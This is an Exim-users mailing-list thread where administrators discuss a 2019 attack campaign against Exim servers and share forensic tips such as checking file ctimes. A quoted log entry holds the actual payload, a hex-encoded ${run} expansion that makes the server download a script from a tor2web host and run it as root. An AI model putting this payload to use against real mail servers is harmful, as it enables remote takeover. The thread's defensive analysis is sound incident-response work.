inline…
On 24/06/2019 7:18 pm, mixed8e--- via Exim-users wrote:
>> On Fri, 2019-06-21 at 15:53 +0200, Heiko Schlittermann via Exim-users
>> wrote:
>>> Check your system for unusual activities.
>>> Symptoms on a hacked system I got aware of were quite similar. The
>>> log
>>> reported about too many received headers:
>>>
>>> root@old-mai:~# exim -Mvl 1hdwsf-0006h5-EE
>>> 2019-06-20 15:13:33 Received from <> H=(<zensored>.de)
>>> [89.248.171.57] P=smtp S=1114
>>> 2019-06-20 15:13:33 routing failed for
>>> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dchec
>>> k\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\
>>> x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x
>>> 20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@<zen
>>> sored>.de: Too many "Received" headers - suspected mail loop
>>> *** Frozen (delivery error message)
>> Checked my mail server today as well and found 46 frozen mails and
>> plenty of the same log messages. All of the mails were sent from a
>> single IP: 89.248.171.57 (scanner20.openportstats.com) and apparently
>> are sent every 3 hours.
>>
>> As far as I can tell nothing was changed on the server though. Files
>> are fine, cron entries are standard and no cryptominer is running (CPU
>> utilization is low).
>
> I got to see this on a server where the attack was successful. The code
> executed by the wget in the ${run...} command downloaded this script:
>
> https://pastebin.com/c3LKPEDU
>
> It tries to maintain infection by inserting several cron changes and copy
> itself in several places around the file system.
>
> On another machine it looks like I saw a different attack, but I don't
> know enough about Exim. There are a large number of files in /root (Exim
> is being run as root on this server) that have names like:
>
> 86NoHEg
> DBaH23d
> f8fam2O
> Cg8E4NM
>
> Those files are all binary, but the dates on them confuse me: there are a
> group from June 15, June 16, then there is a group from May 20 which is
> before the exploit was announced.
It doesn't look related to the attack I saw.
but check the inode change time (ctime), with e.g "ls -lc". In the
attack I saw, there were various faked mtimes, including old ones, but
the ctimes were the day of the attack.
cheers,
calum.
Perhaps this is unrelated? There are no
> cron job entries that try to execute these files. I'm not sure what to
> make of them.
>
> Help?
>
>
>